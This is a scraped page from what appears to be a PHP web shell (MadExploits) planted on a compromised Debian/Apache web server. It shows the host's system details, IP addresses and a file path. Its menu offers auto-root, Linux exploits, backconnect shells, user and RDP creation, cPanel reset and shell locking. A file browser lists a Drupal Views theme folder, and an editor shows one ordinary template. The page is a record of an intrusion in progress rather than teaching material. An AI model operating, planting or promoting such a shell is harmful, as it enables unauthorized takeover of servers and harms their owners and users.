Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.128.168.176
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
views /
theme /
[ HOME SHELL ]
Name
Size
Permission
Action
theme.inc
38.53
KB
-rw-r--r--
views-exposed-form.tpl.php
2.8
KB
-rw-r--r--
views-more.tpl.php
310
B
-rw-r--r--
views-ui-display-tab-bucket.tp...
391
B
-rw-r--r--
views-ui-display-tab-setting.t...
428
B
-rw-r--r--
views-ui-edit-item.tpl.php
1.12
KB
-rw-r--r--
views-ui-edit-view.tpl.php
1.47
KB
-rw-r--r--
views-view-field.tpl.php
796
B
-rw-r--r--
views-view-fields.tpl.php
1.44
KB
-rw-r--r--
views-view-grid.tpl.php
980
B
-rw-r--r--
views-view-grouping.tpl.php
786
B
-rw-r--r--
views-view-list.tpl.php
599
B
-rw-r--r--
views-view-row-comment.tpl.php
602
B
-rw-r--r--
views-view-row-rss.tpl.php
312
B
-rw-r--r--
views-view-rss.tpl.php
565
B
-rw-r--r--
views-view-summary-unformatted...
771
B
-rw-r--r--
views-view-summary.tpl.php
533
B
-rw-r--r--
views-view-table.tpl.php
1.99
KB
-rw-r--r--
views-view-unformatted.tpl.php
384
B
-rw-r--r--
views-view.tpl.php
2.2
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : views-exposed-form.tpl.php
<?php /** * @file * This template handles the layout of the views exposed filter form. * * Variables available: * - $widgets: An array of exposed form widgets. Each widget contains: * - $widget->label: The visible label to print. May be optional. * - $widget->operator: The operator for the widget. May be optional. * - $widget->widget: The widget itself. * - $sort_by: The select box to sort the view using an exposed form. * - $sort_order: The select box with the ASC, DESC options to define order. May be optional. * - $items_per_page: The select box with the available items per page. May be optional. * - $offset: A textfield to define the offset of the view. May be optional. * - $reset_button: A button to reset the exposed filter applied. May be optional. * - $button: The submit button for the form. * * @ingroup views_templates */ ?> <?php if (!empty($q)): ?> <?php // This ensures that, if clean URLs are off, the 'q' is added first so that // it shows up first in the URL. print $q; ?> <?php endif; ?> <div class="views-exposed-form"> <div class="views-exposed-widgets clearfix"> <?php foreach ($widgets as $id => $widget): ?> <div id="<?php print $widget->id; ?>-wrapper" class="views-exposed-widget views-widget-<?php print $id; ?>"> <?php if (!empty($widget->label)): ?> <label for="<?php print $widget->id; ?>"> <?php print $widget->label; ?> </label> <?php endif; ?> <?php if (!empty($widget->operator)): ?> <div class="views-operator"> <?php print $widget->operator; ?> </div> <?php endif; ?> <div class="views-widget"> <?php print $widget->widget; ?> </div> <?php if (!empty($widget->description)): ?> <div class="description"> <?php print $widget->description; ?> </div> <?php endif; ?> </div> <?php endforeach; ?> <?php if (!empty($sort_by)): ?> <div class="views-exposed-widget views-widget-sort-by"> <?php print $sort_by; ?> </div> <div class="views-exposed-widget views-widget-sort-order"> <?php print $sort_order; ?> </div> <?php endif; ?> <?php if (!empty($items_per_page)): ?> <div class="views-exposed-widget views-widget-per-page"> <?php print $items_per_page; ?> </div> <?php endif; ?> <?php if (!empty($offset)): ?> <div class="views-exposed-widget views-widget-offset"> <?php print $offset; ?> </div> <?php endif; ?> <div class="views-exposed-widget views-submit-button"> <?php print $button; ?> </div> <?php if (!empty($reset_button)): ?> <div class="views-exposed-widget views-reset-button"> <?php print $reset_button; ?> </div> <?php endif; ?> </div> </div>
Close